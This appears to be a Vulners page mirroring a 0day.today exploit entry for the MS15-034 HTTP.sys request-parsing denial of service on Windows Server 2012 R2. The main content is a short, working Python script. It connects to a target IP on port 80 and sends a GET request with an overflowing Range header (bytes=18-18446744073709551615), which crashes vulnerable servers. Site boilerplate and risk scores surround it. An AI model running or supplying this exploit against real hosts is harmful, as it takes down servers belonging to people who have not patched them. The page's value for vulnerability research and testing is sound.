Lucene search
K

Microsoft Window (HTTP.sys) HTTP Request Parsing DoS (MS15-034)

🗓️ 17 Apr 2015 00:00:00Reported by Laurent GaffieType 
zdt
 zdt
🔗 0day.today👁 77 Views

HTTP.sys HTTP Request Parsing DoS on Microsoft Windows Server 2012R

Related
Code
#Tested on Win Srv 2012R2.
import socket,sys
  
if len(sys.argv)<=1:
 sys.exit('Give me an IP')
 
Host = sys.argv[1]
 
def SendPayload(Payload, Host):
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect((Host, 80))
   s.send(Payload)
   s.recv(1024)
   s.close()
 
#Make sure iisstart.htm exist.
Init = "GET /iisstart.htm HTTP/1.0\r\n\r\n"
Payload = "GET /iisstart.htm HTTP/1.1\r\nHost: blah\r\nRange: bytes=18-18446744073709551615\r\n\r\n"
 
SendPayload(Init, Host)
SendPayload(Payload, Host)

#  0day.today [2018-04-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Apr 2015 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.9431
77